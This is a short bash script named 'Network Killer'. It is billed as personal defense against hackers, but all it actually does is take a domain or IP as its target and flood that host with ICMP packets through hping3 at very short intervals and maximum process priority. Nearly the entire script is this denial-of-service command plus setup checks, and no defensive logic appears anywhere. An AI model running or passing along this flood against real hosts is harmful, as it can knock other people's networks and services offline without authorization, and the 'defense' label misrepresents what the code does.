#!/bin/bash

###########################################################################################################################
#
# Network Killer, for system's personal defense against hackers.
# By: archnon@protonmail.com, btw
# Based in: bash
# Requires: bash, hping, sudo
#
###########################################################################################################################

RED="\e[1;31m"

GREEN="\e[1;32m"

BLUE="\e[1;34m"

P="\e[1;35m"

YELLOW="\e[1;33m"

ORANGE="\e[38;5;214m"

LB="\e[1;36m"

WHITE="\e[1;37m"

NC="\e[0m"

if ! (command -v hping3 >/dev/null 2>&1); then
	echo -e "\n${RED}[${WHITE}err${RED}]${ORANGE} hping3: ${WHITE}command not found, please, install ${LB}'hping'${WHITE} from your distro's package manager${NC}"
	exit 1
fi

if ! (command -v sudo >/dev/null 2>&1); then
	echo -e "\n${RED}[${WHITE}err${RED}]${ORANGE} sudo: ${WHITE}command not found, please, install ${LB}'sudo'${WHITE} from your distro's package manager${NC}"
	exit 1
fi


if [ $EUID -ne 0 ]; then
    echo -e "\n${RED}[${WHITE}err${RED}] Run as root${NC}"
    exit 1
fi

target=$1

if [ -z $target ]; then
    echo -e "\n${RED}[${WHITE}err${RED}] Missing target, ex: domain, ip.${NC}"
    echo -e "\n${BLUE}[${YELLOW}warn${BLUE}]${WHITE} usage: ${GREEN}sudo ${P}$0 ${YELLOW}<${LB}target${YELLOW}>${NC}"
    exit 1
fi

echo -e "\n${GREEN}[${WHITE}+${GREEN}]${WHITE} Trying to Kill ${YELLOW}'$target'${NC}"

sudo nice -n -20 sudo hping3 -S --icmp -V -i u100 --beep --force-icmp -k -w 9999999999999999999999999999999999 $target && echo -e "\n${BLUE}[${GREEN}notice${BLUE}]${WHITE} Done${NC}" || echo -e "\n${RED}[${WHITE}err${RED}]${WHITE} Oops!, seems like something was not okay..${NC}"
